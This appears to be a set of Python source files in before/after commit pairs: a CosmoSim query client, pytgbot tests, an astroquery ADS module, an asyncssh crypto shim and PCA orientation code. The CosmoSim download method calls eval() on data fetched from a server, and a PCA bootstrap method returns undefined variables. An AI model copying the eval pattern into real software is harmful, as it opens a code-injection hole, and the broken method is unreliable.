The name of the table for which the query data will be stored under. If left blank or if it already exists, one will be generated automatically.
Returns
-------
result : jobid
The jobid of the query
"""
self._existing_tables()
if not queue:
queue = 'short'
if tablename in self.table_dict.values():
result = self.session.post(CosmoSim.QUERY_URL,auth=(self.username,self.password),data={'query':query_string,'phase':'run','queue':queue})
soup = BeautifulSoup(result.content)
gen_tablename = str(soup.find(id="table").string)
logging.warning("Table name {} is already taken.".format(tablename))
print("Generated table name: {}".format(gen_tablename))
elif tablename is None:
result = self.session.post(CosmoSim.QUERY_URL,auth=(self.username,self.password),data={'query':query_string,'phase':'run','queue':queue})
else:
result = self.session.post(CosmoSim.QUERY_URL,auth=(self.username,self.password),data={'query':query_string,'table':'{}'.format(tablename),'phase':'run','queue':queue})
soup = BeautifulSoup(result.content)
self.current_job = str(soup.find("uws:jobid").string)
print("Job created: {}".format(self.current_job))
self._existing_tables()
return self.current_job
def _existing_tables(self):
"""
Internal function which builds a dictionary of the tables already in use for a given set of user credentials. Keys are jobids and values are the tables which are stored under those keys.
"""
checkalljobs = self.check_all_jobs()
completed_jobs = [key for key in self.job_dict.keys() if self.job_dict[key] in ['COMPLETED','EXECUTING']]
soup = BeautifulSoup(checkalljobs.content)
self.table_dict={}
for i in soup.find_all("uws:jobref"):
jobid = i.get('xlink:href').split('/')[-1]
if jobid in completed_jobs:
self.table_dict[jobid] = '{}'.format(i.get('id'))
def check_query_status(self,jobid=None):
"""
A public function which sends an http GET request for a given jobid, and checks the server status. If no jobid is provided, it uses the most recent query (if one exists).
Parameters
----------
jobid : string
The jobid of the sql query. If no jobid is given, it attemps to use the most recent job (if it exists in this session).
Returns
-------
result : content of 'requests.models.Response' object
The requests response phase
"""
if jobid is None:
if hasattr(self,'current_job'):
jobid = self.current_job
else:
try:
jobid = self.current_job
except:
raise AttributeError
response = self.session.get(CosmoSim.QUERY_URL+'/{}'.format(jobid)+'/phase',auth=(self.username,self.password),data={'print':'b'})
print("Job {}: {}".format(jobid,response.content))
return response.content
def check_all_jobs(self):
"""
Public function which builds a dictionary whose keys are each jobid for a given set of user credentials and whose values are the phase status (e.g. - EXECUTING,COMPLETED,PENDING,ERROR).
Returns
-------
checkalljobs : 'requests.models.Response' object
The requests response for the GET request for finding all existing jobs.
"""
checkalljobs = self.session.get(CosmoSim.QUERY_URL,auth=(self.username,self.password),params={'print':'b'})
self.job_dict={}
soup = BeautifulSoup(checkalljobs.content)
for i in soup.find_all("uws:jobref"):
i_phase = str(i.find('uws:phase').string)
if i_phase in ['COMPLETED','EXECUTING','ABORTED','ERROR']:
self.job_dict['{}'.format(i.get('xlink:href').split('/')[-1])] = i_phase
else:
self.job_dict['{}'.format(i.get('id'))] = i_phase
frame = sys._getframe(1)
do_not_print_job_dict = ['completed_job_info','delete_all_jobs','_existing_tables','delete_job','download'] # list of methods which use check_all_jobs() for which I would not like job_dict to be printed to the terminal
if frame.f_code.co_name in do_not_print_job_dict:
return checkalljobs
else:
print(self.job_dict)
return checkalljobs
def completed_job_info(self,jobid=None,output=False):
"""
A public function which sends an http GET request for a given jobid with phase COMPLETED, and returns a list containing the response object. If no jobid is provided, a list of all responses with phase COMPLETED is generated.
Parameters
----------
jobid : string
The jobid of the sql query.
output : bool
Print output of response(s) to the terminal
Returns
-------
result : list
A list of response object(s)
"""
self.check_all_jobs()
if jobid is None:
completed_jobids = [key for key in self.job_dict.keys() if self.job_dict[key] == 'COMPLETED']
response_list = [self.session.get(CosmoSim.QUERY_URL+"/{}".format(completed_jobids[i]),auth=(self.username,self.password)) for i in range(len(completed_jobids))]
else:
if self.job_dict[jobid] == 'COMPLETED':
response_list = [self.session.get(CosmoSim.QUERY_URL+"/{}".format(jobid),auth=(self.username,self.password))]
else:
logging.warning("JobID must refer to a query with a phase of 'COMPLETED'.")
if output is True:
for i in response_list:
print(i.content)
else:
print(response_list)
return response_list
def delete_job(self,jobid=None,squash=None):
"""
A public function which deletes a stored job from the server in any phase. If no jobid is given, it attemps to use the most recent job (if it exists in this session). If jobid is specified, then it deletes the corresponding job, and if it happens to match the existing current job, that variable gets deleted.
Parameters
----------
jobid : string
The jobid of the sql query. If no jobid is given, it attemps to use the most recent job (if it exists in this session).
output : bool
Print output of response(s) to the terminal
Returns
-------
result : list
A list of response object(s)
"""
self.check_all_jobs()
if not jobid:
if hasattr(self,'current_job'):
jobid = self.current_job
if jobid:
if hasattr(self,'current_job'):
if jobid == self.current_job:
del self.current_job
if self.job_dict[jobid] in ['COMPLETED','ERROR','ABORTED','PENDING']:
result = self.session.delete(CosmoSim.QUERY_URL+"/{}".format(jobid),auth=(self.username,self.password),data={'follow':''})
else:
print("Can only delete a job with phase: 'COMPLETED', 'ERROR', 'ABORTED', or 'PENDING'.")
return
if not result.ok:
result.raise_for_status()
if squash is None:
print('Deleted job: {}'.format(jobid))
return result
def abort_job(self,jobid=None):
"""
"""
self.check_all_jobs()
def delete_all_jobs(self):
"""
A public function which deletes all jobs from the server in any phase.
"""
self.check_all_jobs()
for key in self.job_dict.keys():
result = self.session.delete(CosmoSim.QUERY_URL+"/{}".format(key),auth=(self.username,self.password),data={'follow':''})
if not result.ok:
result.raise_for_status()
print("Deleted job: {}".format(key))
return
def _generate_schema(self):
"""
Internal function which builds a schema of all simulations within the database (in the form of a dictionary).
"""
response = requests.get(CosmoSim.SCHEMA_URL,
auth=(self.username,self.password),
headers = {'Accept': 'application/json'})
data = response.json()
self.db_dict = {}
for i in range(len(data['databases'])):
self.db_dict['{}'.format(data['databases'][i]['name'])] = {}
sstr = '{}'.format(data['databases'][i]['name'])
sid = '{}'.format(data['databases'][i]['id'])
self.db_dict[sstr]['id'] = sid
sdesc = '{}'.format(data['databases'][i]['description'])
self.db_dict[sstr]['description'] = sdesc
self.db_dict[sstr]['tables'] = {}
for j in range(len(data['databases'][i]['tables'])):
sstr2 = '{}'.format(data['databases'][i]['tables'][j]['name'])
self.db_dict[sstr]['tables'][sstr2] = {}
sdata = data['databases'][i]['tables'][j]['id']
self.db_dict[sstr]['tables'][sstr2]['id'] = sdata
sdesc2 = data['databases'][i]['tables'][j]['description']
self.db_dict[sstr]['tables'][sstr2]['description'] = sdesc2
self.db_dict[sstr]['tables'][sstr2]['columns'] = {}
tmpval = len(data['databases'][i]['tables'][j]['columns'])
for k in range(tmpval):
sstr3 = '{}'.format(data['databases'][i]['tables'][j]['columns'][k]['name'])
self.db_dict[sstr]['tables'][sstr2]['columns'][sstr3] = {}
sdata2 = data['databases'][i]['tables'][j]['columns'][k]['id']
self.db_dict[sstr]['tables'][sstr2]['columns'][sstr3]['id'] = sdata2
sdesc3 = data['databases'][i]['tables'][j]['columns'][k]['description']
self.db_dict[sstr]['tables'][sstr2]['columns'][sstr3]['description'] = sdesc3
return response
def explore_db(self,db=None,table=None,col=None):
"""
A public function which allows for the exploration of any simulation and its tables within the database. This function is meant to aid the user in constructing sql queries.
Parameters
----------
db : string
The database to explore.
table : string
The table to explore.
col : string
The column to explore.
"""
try:
self.db_dict
except AttributeError:
self._generate_schema()
if db:
if table:
if col:
print("#"*(len(db)+4) + "\n# {} #\n".format(db) + "#"*(len(db)+4))
print("@ {}".format("tables"))
print(" @ {}".format(table))
print(" "*6 + "@ {}".format("columns"))
print(" "*9 + "@ {}".format('{}'.format(col)))
for i in self.db_dict['{}'.format(db)]['tables']['{}'.format(table)]['columns']['{}'.format(col)].keys():
print(" "*12 + "--> {}:{}".format(i,self.db_dict['{}'.format(db)]['tables']['{}'.format(table)]['columns']['{}'.format(col)][i]))
else:
print("#"*(len(db)+4) + "\n# {} #\n".format(db) + "#"*(len(db)+4))
print("@ {}".format("tables"))
print(" @ {}".format(table))
for i in self.db_dict['{}'.format(db)]['tables']['{}'.format(table)].keys():
if type(self.db_dict['{}'.format(db)]['tables']['{}'.format(table)][i]) == dict:
print(" "*6 + "@ {}".format(i))
for j in self.db_dict['{}'.format(db)]['tables']['{}'.format(table)][i].keys():
print(" "*9 + "--> {}".format(j))
else:
print(" "*6 + "$ {}".format(i))
print(" "*9 + "--> {}".format(self.db_dict['{}'.format(db)]['tables']['{}'.format(table)][i]))
else:
print("#"*(len(db)+4) + "\n# {} #\n".format(db) + "#"*(len(db)+4))
for i in self.db_dict['{}'.format(db)].keys():
if type(self.db_dict['{}'.format(db)][i]) == dict:
print("@ {}".format(i))
for j in self.db_dict['{}'.format(db)][i].keys():
print(" --> {}".format(j))
else:
print("$ {}".format(i))
print(" --> {}".format(self.db_dict['{}'.format(db)][i]))
else:
print("Must choose a database to explore:")
for i in self.db_dict.keys():
print(" ## " + "{}".format(i))
return
def download(self,jobid=None,filename=None,format=None):
"""
A public function to download data from a job with COMPLETED phase.
Keyword Args
------------
jobid :
Completed jobid to be downloaded
filename : string
If left blank, downloaded to the terminal. If specified, data is written out to file (directory can be included here).
Returns
-------
headers, data : list, list
"""
if not jobid:
try:
jobid = self.current_job
except:
raise
self.check_all_jobs()
completed_job_responses = self.completed_job_info(jobid)
soup = BeautifulSoup(completed_job_responses[0].content)
tableurl = soup.find("uws:result").get("xlink:href")
# This is where the request.content parsing happens
raw_table_data = self.session.get(tableurl,auth=(self.username,self.password))
raw_headers = raw_table_data.content.split('\n')[0]
num_cols = len(raw_headers.split(','))
num_rows = len(raw_table_data.content.split('\n'))-2
headers = [raw_headers.split(',')[i].strip('"') for i in range(num_cols)]
raw_data = [raw_table_data.content.split('\n')[i+1].split(",") for i in range(num_rows)]
data = [map(eval,raw_data[i]) for i in range(num_rows)]
if format:
tbl = Table(data=map(list, zip(*data)),names=headers)
if format in ['VOTable','votable']:
votbl = votable.from_table(tbl)
if not filename:
return votbl
else:
if '.xml' in filename:
filename = filename.split('.')[0]
votable.writeto(votbl, "{}.xml".format(filename))
print("Data written to file: {}.xml".format(filename))
elif format in ['FITS','fits']:
print("Need to implement...")
else:
if not filename:
return headers, data
else:
with open(filename, 'wb') as fh:
raw_table_data = self.session.get(tableurl,auth=(self.username,self.password),stream=True)
for block in raw_table_data.iter_content(1024):
if not block:
break
fh.write(block)
print("Data written to file: {}".format(filename))
return headers, data
def _check_phase(self,jobid):
self._existing_tables()
if jobid not in self.job_dict.keys():
logging.error("Job not present in job doctionary.")
return
else:
phase = self.job_dict['{}'.format(jobid)]
return phase
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from unittest import TestCase
from luckydonaldUtils.logger import logging
from pytgbot.api_types.receivable.updates import Update, Message
__author__ = 'luckydonald'
logger = logging.getLogger(__name__)
if __name__ == '__main__':
logging.add_colored_handler(level=logging.DEBUG)
# end if
class TestUpdate(TestCase):
def test_1(self):
data = {
"update_id": 1234,
}
update = Update.from_array(data)
self.assertEqual(1234, update.update_id)
self.assertIsNone(update.message, "element should be not set")
self.assertIsNone(update.callback_query, "element should be not set")
self.assertIsNone(update.inline_query, "element should be not set")
self.assertIsNone(update.channel_post, "element should be not set")
self.assertIsNone(update.chosen_inline_result, "element should be not set")
self.assertIsNone(update.edited_channel_post, "element should be not set")
self.assertIsNone(update.poll, "element should be not set")
self.assertIsNone(update.pre_checkout_query, "element should be not set")
self.assertIsNone(update.shipping_query, "element should be not set")
self.assertNotIn("message", update, "__contains__ should be false as well")
self.assertNotIn("callback_query", update, "__contains__ should be false as well")
self.assertNotIn("inline_query", update, "__contains__ should be false as well")
self.assertNotIn("channel_post", update, "__contains__ should be false as well")
self.assertNotIn("chosen_inline_result", update, "__contains__ should be false as well")
self.assertNotIn("edited_channel_post", update, "__contains__ should be false as well")
self.assertNotIn("poll", update, "__contains__ should be false as well")
self.assertNotIn("pre_checkout_query", update, "__contains__ should be false as well")
self.assertNotIn("shipping_query", update, "__contains__ should be false as well")
new = Update(update_id=1234)
self.assertEqual(data, new.to_array(), 'to_array()')
# end def
class TestMessage(TestCase):
def test_1(self):
data = {
"date": 1441645532,
"chat": {
"id": 1111101,
"type": "private",
"first_name": "Alfred",
"last_name": "Alfons",
},
"message_id": 1365,
"from": {
"id": 1111101,
"first_name": "Alfred",
"last_name": "Alfons",
"is_bot": False,
},
"text": "/start"
}
msg = Message.from_array(data)
self.assertEqual(1441645532, msg.date)
from pytgbot.api_types.receivable.peer import Chat, User
new = Message(
message_id=1365, date=1441645532,
chat=Chat(id=1111101, type="private", first_name="Alfred", last_name="Alfons"),
from_peer=User(id=1111101, first_name="Alfred", last_name="Alfons", is_bot=False),
text="/start"
)
self.assertEqual(data, new.to_array(), 'to_array()')
# end def
# end class
Should implement the compare function at some point.
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from unittest import TestCase
from luckydonaldUtils.logger import logging
from pytgbot.api_types.receivable.updates import Update, Message
__author__ = 'luckydonald'
logger = logging.getLogger(__name__)
if __name__ == '__main__':
logging.add_colored_handler(level=logging.DEBUG)
# end if
class TestUpdate(TestCase):
def test_1(self):
data = {
"update_id": 1234,
}
update = Update.from_array(data)
self.assertEqual(1234, update.update_id)
self.assertIsNone(update.message, "element should be not set")
self.assertIsNone(update.callback_query, "element should be not set")
self.assertIsNone(update.inline_query, "element should be not set")
self.assertIsNone(update.channel_post, "element should be not set")
self.assertIsNone(update.chosen_inline_result, "element should be not set")
self.assertIsNone(update.edited_channel_post, "element should be not set")
self.assertIsNone(update.poll, "element should be not set")
self.assertIsNone(update.pre_checkout_query, "element should be not set")
self.assertIsNone(update.shipping_query, "element should be not set")
self.assertNotIn("message", update, "__contains__ should be false as well")
self.assertNotIn("callback_query", update, "__contains__ should be false as well")
self.assertNotIn("inline_query", update, "__contains__ should be false as well")
self.assertNotIn("channel_post", update, "__contains__ should be false as well")
self.assertNotIn("chosen_inline_result", update, "__contains__ should be false as well")
self.assertNotIn("edited_channel_post", update, "__contains__ should be false as well")
self.assertNotIn("poll", update, "__contains__ should be false as well")
self.assertNotIn("pre_checkout_query", update, "__contains__ should be false as well")
self.assertNotIn("shipping_query", update, "__contains__ should be false as well")
new = Update(update_id=1234)
self.assertEqual(data, new.to_array(), 'to_array()')
# self.assertEqual(data, update, 'compare')
# end def
class TestMessage(TestCase):
def test_1(self):
data = {
"date": 1441645532,
"chat": {
"id": 1111101,
"type": "private",
"first_name": "Alfred",
"last_name": "Alfons",
},
"message_id": 1365,
"from": {
"id": 1111101,
"first_name": "Alfred",
"last_name": "Alfons",
"is_bot": False,
},
"text": "/start"
}
msg = Message.from_array(data)
self.assertEqual(1441645532, msg.date)
from pytgbot.api_types.receivable.peer import Chat, User
new = Message(
message_id=1365, date=1441645532,
chat=Chat(id=1111101, type="private", first_name="Alfred", last_name="Alfons"),
from_peer=User(id=1111101, first_name="Alfred", last_name="Alfons", is_bot=False),
text="/start"
)
self.assertEqual(data, new.to_array(), 'to_array()')
# self.assertEqual(data, msg, 'compare')
# end def
# end class
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Module to search the SAO/NASA Astrophysics Data System
:author: Magnus Persson <magnusp@vilhelm.nu>
"""
import os
from astropy.table import Table
from astropy.extern.six.moves.urllib.parse import quote as urlencode
from ..query import BaseQuery
from ..utils import async_to_sync
from ..utils.class_or_instance import class_or_instance
from .utils import _get_data_from_xml
from . import conf
from xml.dom import minidom
__all__ = ['ADS', 'ADSClass']
@async_to_sync
class ADSClass(BaseQuery):
SERVER = conf.server
QUERY_SIMPLE_PATH = conf.simple_path
TIMEOUT = conf.timeout
ADS_FIELDS = conf.adsfields
NROWS = conf.nrows
NSTART = conf.nstart
TOKEN = conf.token
QUERY_SIMPLE_URL = SERVER + QUERY_SIMPLE_PATH
def __init__(self, *args):
""" set some parameters """
super(ADSClass, self).__init__()
@class_or_instance
def query_simple(self, query_string, get_query_payload=False,
get_raw_response=False, cache=True):
"""
Basic query. Uses a string and the ADS generic query.
"""
request_string = self._args_to_url(query_string)
request_fields = self._fields_to_url()
request_rows = self._rows_to_url(self.NROWS, self.NSTART)
request_url = self.QUERY_SIMPLE_URL + request_string + request_fields + request_rows
# primarily for debug purposes, but also useful if you want to send
# someone a URL linking directly to the data
if get_query_payload:
return request_url
headers = {'Authorization': 'Bearer ' + self._get_token()}
response = self._request(method='GET', url=request_url,
headers=headers, timeout=self.TIMEOUT,
cache=cache)
response.raise_for_status()
if get_raw_response:
return response
# parse the XML response into AstroPy Table
resulttable = self._parse_response(response.json())
return resulttable
def _parse_response(self, response):
try:
response['response']['docs'][0]['bibcode']
except IndexError:
raise RuntimeError('No results returned!')
# get the list of hits
hitlist = response['response']['docs']
t = Table()
# Grab the various fields and put into AstroPy table
for field in self.ADS_FIELDS:
tmp = _get_data_from_xml(hitlist, field)
t[field] = tmp
return t
def _args_to_url(self, query_string):
# convert arguments to a valid requests payload
# i.e. a dictionary
request_string = 'q=' + urlencode(query_string)
return request_string
def _fields_to_url(self):
request_fields = '&fl=' + ','.join(self.ADS_FIELDS)
return request_fields
def _rows_to_url(self, nrows=10, nstart=0):
request_rows = '&rows=' + str(nrows) + '&start=' + str(nstart)
return request_rows
def _get_token(self):
"""
Try to get token from the places Andy Casey's python ADS client expects it, otherwise return an error
"""
if self.TOKEN is not None:
return self.TOKEN
self.TOKEN = os.environ.get('ADS_DEV_KEY', None)
if self.TOKEN is not None:
return self.TOKEN
token_file = os.path.expanduser(os.path.join('~', '.ads', 'dev_key'))
try:
with open(token_file) as f:
self.TOKEN = f.read().strip()
return self.TOKEN
except IOError:
raise RuntimeError('No API token found! Get yours from: ' +
'https://ui.adsabs.harvard.edu/#user/settings/token ' +
'and store it in the API_DEV_KEY environment variable.')
ADS = ADSClass()
Fix failing test
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Module to search the SAO/NASA Astrophysics Data System
:author: Magnus Persson <magnusp@vilhelm.nu>
"""
import os
from astropy.table import Table
from astropy.extern.six.moves.urllib.parse import quote as urlencode
from ..query import BaseQuery
from ..utils import async_to_sync
from ..utils.class_or_instance import class_or_instance
from .utils import _get_data_from_xml
from . import conf
from xml.dom import minidom
__all__ = ['ADS', 'ADSClass']
@async_to_sync
class ADSClass(BaseQuery):
SERVER = conf.server
QUERY_SIMPLE_PATH = conf.simple_path
TIMEOUT = conf.timeout
ADS_FIELDS = conf.adsfields
NROWS = conf.nrows
NSTART = conf.nstart
TOKEN = conf.token
QUERY_SIMPLE_URL = SERVER + QUERY_SIMPLE_PATH
def __init__(self, *args):
""" set some parameters """
super(ADSClass, self).__init__()
@class_or_instance
def query_simple(self, query_string, get_query_payload=False,
get_raw_response=False, cache=True):
"""
Basic query. Uses a string and the ADS generic query.
"""
request_string = self._args_to_url(query_string)
request_fields = self._fields_to_url()
request_rows = self._rows_to_url(self.NROWS, self.NSTART)
request_url = self.QUERY_SIMPLE_URL + request_string + request_fields + request_rows
# primarily for debug purposes, but also useful if you want to send
# someone a URL linking directly to the data
if get_query_payload:
return request_url
response = self._request(method='GET', url=request_url,
headers={'Authorization': 'Bearer ' + self._get_token()},
timeout=self.TIMEOUT, cache=cache)
response.raise_for_status()
if get_raw_response:
return response
# parse the XML response into AstroPy Table
resulttable = self._parse_response(response.json())
return resulttable
def _parse_response(self, response):
try:
response['response']['docs'][0]['bibcode']
except IndexError:
raise RuntimeError('No results returned!')
# get the list of hits
hitlist = response['response']['docs']
t = Table()
# Grab the various fields and put into AstroPy table
for field in self.ADS_FIELDS:
tmp = _get_data_from_xml(hitlist, field)
t[field] = tmp
return t
def _args_to_url(self, query_string):
# convert arguments to a valid requests payload
# i.e. a dictionary
request_string = 'q=' + urlencode(query_string)
return request_string
def _fields_to_url(self):
request_fields = '&fl=' + ','.join(self.ADS_FIELDS)
return request_fields
def _rows_to_url(self, nrows=10, nstart=0):
request_rows = '&rows=' + str(nrows) + '&start=' + str(nstart)
return request_rows
def _get_token(self):
"""
Try to get token from the places Andy Casey's python ADS client expects it, otherwise return an error
"""
if self.TOKEN is not None:
return self.TOKEN
self.TOKEN = os.environ.get('ADS_DEV_KEY', None)
if self.TOKEN is not None:
return self.TOKEN
token_file = os.path.expanduser(os.path.join('~', '.ads', 'dev_key'))
try:
with open(token_file) as f:
self.TOKEN = f.read().strip()
return self.TOKEN
except IOError:
raise RuntimeError('No API token found! Get yours from: ' +
'https://ui.adsabs.harvard.edu/#user/settings/token ' +
'and store it in the API_DEV_KEY environment variable.')
ADS = ADSClass()
|
# Copyright (c) 2014-2015 by Ron Frederick <ronf@timeheart.net>.
# All rights reserved.
#
# This program and the accompanying materials are made available under
# the terms of the Eclipse Public License v1.0 which accompanies this
# distribution and is available at:
#
# http://www.eclipse.org/legal/epl-v10.html
#
# Contributors:
# Ron Frederick - initial implementation, API, and documentation
"""A shim for accessing cryptographic primitives needed by asyncssh"""
import importlib
from .cipher import register_cipher, lookup_cipher
from .curve25519 import Curve25519DH
from . import chacha
pyca_available = importlib.find_loader('cryptography')
pycrypto_available = importlib.find_loader('Crypto')
if pyca_available:
from . import pyca
if pycrypto_available:
from . import pycrypto
if pyca_available:
from .pyca.dsa import DSAPrivateKey, DSAPublicKey
from .pyca.rsa import RSAPrivateKey, RSAPublicKey
elif pycrypto_available:
from .pycrypto.dsa import DSAPrivateKey, DSAPublicKey
from .pycrypto.rsa import RSAPrivateKey, RSAPublicKey
else:
raise ImportError('No suitable crypto library found.')
Allow Curve25519DH import to fail in crypto package
With the refactoring to avoid pylint warnings, a problem was introduced
in importing the crypto module when the curve25519 dependencies were
unavailable. This commit fixes that problem.
# Copyright (c) 2014-2015 by Ron Frederick <ronf@timeheart.net>.
# All rights reserved.
#
# This program and the accompanying materials are made available under
# the terms of the Eclipse Public License v1.0 which accompanies this
# distribution and is available at:
#
# http://www.eclipse.org/legal/epl-v10.html
#
# Contributors:
# Ron Frederick - initial implementation, API, and documentation
"""A shim for accessing cryptographic primitives needed by asyncssh"""
import importlib
from .cipher import register_cipher, lookup_cipher
try:
from .curve25519 import Curve25519DH
except ImportError:
pass
from . import chacha
pyca_available = importlib.find_loader('cryptography')
pycrypto_available = importlib.find_loader('Crypto')
if pyca_available:
from . import pyca
if pycrypto_available:
from . import pycrypto
if pyca_available:
from .pyca.dsa import DSAPrivateKey, DSAPublicKey
from .pyca.rsa import RSAPrivateKey, RSAPublicKey
elif pycrypto_available:
from .pycrypto.dsa import DSAPrivateKey, DSAPublicKey
from .pycrypto.rsa import RSAPrivateKey, RSAPublicKey
else:
raise ImportError('No suitable crypto library found.')
|
# -*- coding: utf-8 -*-
from __future__ import division
import numpy as N
from scipy.sparse import bsr_matrix
from scipy.linalg import lu
from scipy.sparse.linalg import svds
from itertools import chain
from seaborn.algorithms import bootstrap
from ..coordinates import centered
from .base import BaseOrientation, rotation
from ..error.ellipse import ellipse
from ..geom.util import dot
from ..geom.vector import vector
from ..geom.conics import conic
def augment(matrix):
size = matrix.shape
_ = N.identity(size[0]+1)
_[:size[0],:size[1]] = matrix
return _
def augment_vector(vec):
return N.append(vec,[1],axis=0)
def rotate_tensor(tensor,transform):
"""
Transforms a tensor by an affine transform
"""
return dot(transform, tensor, transform.T)
def compose_affine(*transforms):
"""
Returns a composite of several affine transformations.
"""
return reduce(N.dot,reversed(transforms))
def normalize(v):
return v/N.linalg.norm(v)
def vector_angle(v1,v2):
_ = N.dot(normalize(v1),normalize(v2).T)
return N.arccos(_)
## magnitude of vector (by row)
norm = lambda x: N.linalg.norm(x,2,1)
def axis_transform(pca_axes):
"""
Creates an affine transformation matrix to
rotate data in PCA axes into Cartesian plane
"""
from_ = N.identity(3)
to_ = pca_axes
# Find inverse transform for forward transform
# y = M x -> M = y (x)^(-1)
# We don't need to do least-squares since
# there is a simple transformation
trans_matrix = N.linalg.lstsq(from_,to_)[0]
return trans_matrix
def test_SVD(pca):
"""
Function to test the validity of singular
value decomposition by reconstructing original
data.
"""
_ = pca
rec = N.dot(_.U,N.dot(_.sigma,_.V))
assert N.allclose(_.arr,rec)
def covariance_matrix(self):
"""
Constructs the covariance matrix of
input data from
the singular value decomposition. Note
that this is different than a covariance
matrix of residuals, which is what we want
for calculating fit errors.
Using SVD output to compute covariance matrix
X=UΣV⊤
XX⊤XX⊤=(UΣV⊤)(UΣV⊤)⊤=(UΣV⊤)(VΣU⊤)
V is an orthogonal matrix (V⊤V=I),
covariance matrix of input data: XX⊤=UΣ2U⊤
Because the axes represent identity in the
PCA coordinate system, the PCA major axes
themselves represent an affine transformation
matrix from PCA to Cartesian space
"""
a = N.dot(self.U,self.sigma)
cv = N.dot(a,a.T)
# This yields the covariance matrix in Cartesian
# coordinates
return cv
class PCAOrientation(BaseOrientation):
""" Gets the axis-aligned principle components
of the dataset.
"""
def __init__(self, arr):
""" Requires an object implementing the
Attitude interface
"""
# For principal components, data needs
# to be pre-processed to have zero mean
self.arr = centered(arr)
# Note: it might be desirable to further
# standardize the data by dividing by
# the standard deviation as such
# self.arr /= self.arr.std(axis=0)
# but this is not clear. Not dividing by
# std leaves us with an eigen-analysis of
# the *covariance matrix*, while dividing
# by it leaves us with an eigen-analysis
# of the *correlation matrix*
self.n = len(self.arr)
#ratio = self.n/1e4
#if ratio > 2:
# r = N.floor(ratio)
# self.n /= r
# self.arr = self.arr[::r,:]
res = N.linalg.svd(self.arr,
full_matrices=False)
self.U, s, V = res
self.singular_values = s
self.axes = V
self.sigma = N.diag(self.singular_values)
self.V = V
# Similar to normal vector, but not rotated into
# Cartesian frame
self.offset = N.cross(self.sigma[0],self.sigma[1])
self.normal = self.axes[2]
self._vertical = N.array([0,0,1])
self.strike = N.cross(self.normal,self._vertical)
self.dip_dr = normalize(N.cross(self.strike,self.normal))
def whitened(self):
"""
Returns a 'whitened' or decorrelated version of
the input data, where variances along all axes
are rescaled to 1 (i.e. the covariance matrix
becomes an identity matrix).
"""
return N.dot(self.U,self.V.T)
def rotated(self):
"""
Returns a dataset 'despun' so that
it is aligned with the princpal
axes of the dataset.
"""
return N.dot(self.U,self.sigma)
def residuals(self):
"""
Returns residuals of fit against all
three data axes (singular values 1, 2,
and 3). This takes the form of data along
singular axis 3 (axes 1 and 2 define the plane)
"""
_ = self.rotated()
_[:,-1] = 0
_ = N.dot(_,self.axes)
return self.arr - _
@property
def covariance_matrix(self):
"""
Constructs the covariance matrix from PCA
residuals
"""
return self.sigma**2/(self.n-1)
@property
def explained_variance(self):
"""
Proportion of variance that is explained by the
first two principal components (which together
represent the planar fit). Analogous to R^2 of
linear least squares.
"""
v = N.diagonal(self.covariance_matrix)
return v[0:2].sum()/v.sum()
@property
def coefficients(self):
return self.axes[2]
@property
def azimuth(self):
c = self.coefficients
return N.arctan2(c[0],c[1])
@property
def slope(self):
_ = self.coefficients
mag = N.linalg.norm(_)
return N.arccos(_[2]/mag)
def strike_dip(self):
""" Computes strike and dip from a normal vector.
Results are usually exactly the same as LLSQ
in strike (to a few decimal places) and close in dip.
Sometimes, dips are greater by as much as 45 degrees,
reflecting inclusion of errors in x-y plane.
"""
n = self.axes[2]
r = N.linalg.norm(n)
strike = N.degrees(N.arctan2(n[0],n[1]))-90
dip = N.degrees(N.arccos(n[2]/r))
# Since PCA errors are not pinned to the XYZ plane,
# we need to make sure our results are in the
# right quadrant.
if dip > 90:
dip = 180 - dip
strike += 180
return strike, dip
def as_conic(self, level=1):
if dot(self.axes[2],vector(0,0,1)) < 0:
self.axes *= -1
cov = self.covariance_matrix
idx = N.diag_indices(3)
ell = N.identity(4)
ell[idx] = 1/cov[idx]*level**2 #cov*level**2#
ell[3,3] = -1
ell = conic(ell)
# Translate ellipse along 3rd major axis
ell = ell.translate(self.offset)
# Rotate ellipse matrix into cartesian
# plane
R = augment(self.axes)
return ell.transform(R)
def as_hyperbola(self, rotated=False):
"""
Hyperbolic error area
"""
pca_res = 1/(self.singular_values/4)#((self.singular_values/2)**2)
#pca_res = self.singular_values
arr = N.identity(4)
arr[0,0] = pca_res[0]
arr[1,1] = pca_res[1]
arr[2,2] = -pca_res[2]
arr[3,3] = -1
return conic(arr)
def _ellipse(self, level=1):
ell = self.as_conic(level=level)
con, matrix, center = ell.projection()
ax = con.major_axes()
# Rotate major axes into 3d space
axs_ = N.append(ax,N.zeros((2,1)),axis=1)
axs = dot(axs_,matrix[:3])
u = N.linspace(0,2*N.pi,1000)
# Get a bundle of vectors defining cone
# which circumscribes ellipsoid
angles = N.array([N.cos(u),N.sin(u)]).T
# Turn into vectors
return dot(angles,axs),center
def plane_errors(self, **kwargs):
data, center = self._ellipse(**kwargs)
data += center
v = N.cross(data,center)
#2v = N.cross(ax,data)
r = N.linalg.norm(v,axis=1)
plunge = N.arcsin(v[:,2]/r)
trend = N.arctan2(v[:,0],v[:,1])
v = N.cross(center,data)
#v = N.cross(ax,data)
r = N.linalg.norm(v,axis=1)
plunge2 = N.arcsin(v[:,2]/r)
trend2 = N.arctan2(v[:,0],v[:,1])
return ((N.pi+trend,plunge),(N.pi+trend2,plunge2))
def error_ellipse(self, spherical=True, vector=False, level=1):
data,center = self._ellipse(level)
data += center
r = N.linalg.norm(data,axis=1)
plunge = N.arcsin(data[:,2]/r)
trend = N.arctan2(data[:,0],data[:,1])
#m = N.linalg.norm(axs,axis=1)
#c = N.linalg.norm(center)
#a_dist = [N.degrees(N.arctan2(i,c)) for i in m]
#if spherical:
# return e + N.array([self.azimuth+N.pi/2,0])
return (trend,plunge)
def bootstrap(self):
reg_func = lambda arr: N.linalg.svd(arr,full_matrices=False)[2][2]
beta_boots = bootstrap(self.arr, func=reg_func)
return yhat, yhat_boots
Updated method of computing hyperbolic errors
# -*- coding: utf-8 -*-
from __future__ import division
import numpy as N
from scipy.sparse import bsr_matrix
from scipy.linalg import lu
from scipy.sparse.linalg import svds
from itertools import chain
from seaborn.algorithms import bootstrap
from ..coordinates import centered
from .base import BaseOrientation, rotation
from ..error.ellipse import ellipse
from ..geom.util import dot
from ..geom.vector import vector
from ..geom.conics import conic
def augment(matrix):
size = matrix.shape
_ = N.identity(size[0]+1)
